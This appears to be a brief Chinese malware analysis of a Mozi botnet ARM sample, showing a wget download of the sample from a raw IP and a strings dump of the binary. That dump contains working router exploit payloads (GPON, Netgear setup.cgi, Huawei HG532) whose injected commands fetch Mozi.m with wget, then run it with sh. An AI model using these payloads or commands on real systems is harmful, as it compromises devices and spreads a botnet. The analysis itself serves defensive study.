样本:wget http://182.121.157.194:57811/Mozi.m
使用linux file strings进行静态分析
file Mozi.m
Mozi.m: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
可以看出这是 linux下可执行文件 32位 静态链接 没有符合表
strings
JR*
gfff
gfff
VUUUHY
VUUU
Qgfff
>0@-
gfff
@ #!
!1C “
POST /cdn-cgi/
HTTP/1.1
User-Agent:
Host:
Cookie:
http
url=
POST
socket error
error
packet send2 error %d which means %s
packet send error %d which means %s
/var/
.ipds
.config
%d.%d.%d.%d
GET /c HTTP/1.0
Host: %s
%hhu.%hhu.%hhu.%hhu
8.8.8.8 114.114.114.114
/var/tmp/
/var/run/
/dev/shm/
/proc/
/usr/
/mnt/
/home/
[cnc]
[/cnc]
%5hu
HTTP/1.1
Content-Length:
Content-Type:
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Content-Type: application/octet-stream
Referer: http://baidu.com/%s/%s/%d/%s/%s/%s/%s))
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Content-Type: application/octet-stream
no aliases
http://
https://
%lu.%lu.%lu.%lu
(null)
http://ipinfo.io/ip
[dip]
[/dip]
7001
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: /
User-Agent: Hello-World
Connection: keep-alive
<?xml version=”1.0” ?>
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: %s:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30”, uri=”/ctrlt/DeviceUpgrade_1”, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5”, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669”
<?xml version=”1.0” ?>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7574
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version=”1.0”?></NewNTPServer1><NewNTPServer2>echo DEATH</NewNTPServer2><NewNTPServer3>echo DEATH</NewNTPServer3><NewNTPServer4>echo DEATH</NewNTPServer4><NewNTPServer5>echo DEATH`
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
蠕虫传播过程就是,运行以后得到ip,同时搜索广播ip,使用SOAP发送路由器账号密码登录传播蠕虫文件…..大概是这样。
